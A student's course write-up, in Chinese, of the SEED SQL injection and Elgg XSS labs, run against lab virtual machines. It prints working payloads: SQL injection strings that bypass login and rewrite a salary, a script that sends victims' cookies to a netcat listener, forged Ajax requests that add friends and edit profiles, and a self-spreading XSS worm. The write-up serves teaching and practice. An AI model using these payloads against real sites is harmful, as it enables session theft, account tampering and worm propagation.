20212929 2021-2022-2 《网络攻防实践》实践10作业

1 实验内容

一、SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序，并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：
熟悉SQL语句：我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。
对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。
对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
SQL对抗：修复上述SQL注入攻击漏洞。
二、SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。
发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。
弹窗显示cookie信息：将cookie信息显示。
窃取受害者的cookies：将cookie发送给攻击者。
成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。
修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。
编写XSS蠕虫。
对抗XSS攻击。

2 实验过程

2.1 sql注入实验

使用命令登录mysql:mysql -u root -p

查看mysql中的数据：show databases;

选择Users这张表：use Users;

查看这张表：show tables;

选择这张表中的数据：select * from credential;

查询ALICE的所有信息select * from credential where Name='Alice';

输入命令vim /var/www/SQLInjection/unsafe_home.php查看源代码，直接将密码和名字加入到了字符串当中，所有如果写Admin' #，#代表注释所以会只查询名字不查询密码。

在网站中输入admin' #,

发现Admin的salary

打开vim unsafe_edit_backend.php发现在UPDATE中直接填入了nickname所以只需要在网页端输入', Salary='987' where name='Admin'; #，就会将名字后部分作为注释

点击执行发现Admin的Salary变为了987。

2.2 XSS实验

在网站http://www.xsslabelgg.com/登录账号Alice密码seedalice

在brief description输入<script>alert("XSS");</script>

点击保存后弹出窗口，证明XSS攻击成功

2.3查看cookie信息

输入<script>alert(document.cookie);</script>

查看自己的IP，输入命令返回cookie<script>document.write('<img src=http://192.168.200.7:5555?c='+escape(document.cookie) + ' >');</script>，，并开启监听查看返回的值nc -l 5555 -v,点击保存显示监听信息。

2.4.点击主页添加好友

在火狐中添加HTTP HEADERhttps://addons.mozilla.org/zh-CN/firefox/addon/http-header-live/versions/
打开header,点击添加朋友，拦截到信息如下

点击查看第一个为朋友ID,第二个为当前时间，第三个为身份认证
friend=45&__elgg_ts=1652759839&__elgg_token=MgVSfSJ8CBK0kbQsEln-Zg

由此写一下代码如下

点击查看代码

<script type="text/javascript">
window.onload = function () {
	var Ajax=null;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;


	//Construct the HTTP request to add Samy as a friend.
	var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token; 

	//Create and send Ajax request to add friend
	Ajax=new XMLHttpRequest();
	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.send();
}
</script>

将代码粘贴到Alice的about me中

alice显示无好友

打开Boby，访问alice的主页，发现header中添加了alice的好友

boby朋友圈显示alice的信息

2.5 修改boby的about me

在正常修改信息的时候，包含以下信息

修改Boby的信息，在alice中添加下面代码

点击查看代码

<script type="text/javascript">
	window.onload = function(){
  //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
  //and Security Token __elgg_token
	var userName=elgg.session.user.name;
	var guid="&guid="+elgg.session.user.guid;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
  
  var content=token+ts+"name="+userName+"&description=<p>This have been cracked by alice.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;  

  var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	  
	var samyGuid=44;    
	if(elgg.session.user.guid!=samyGuid){
   	//Create and send Ajax request to modify profile
   	var Ajax=null;
   	Ajax=new XMLHttpRequest();
   	Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    Ajax.send(content);
  }
}

</script>

打开boby,点击alice的信息，打开boby主页发现攻击成功

2.6 通过蠕虫传播攻击

在alice中添加以下代码

点击查看代码

<script id="worm" type="text/javascript">
	window.onload = function(){
		var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
		var jsCode = document.getElementById("worm").innerHTML;
		var tailTag = "</" + "script>"; 
		var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack  "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)

		var samyGuid=44;

		if(elgg.session.user.guid!=samyGuid)
		{
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
		
	}
</script>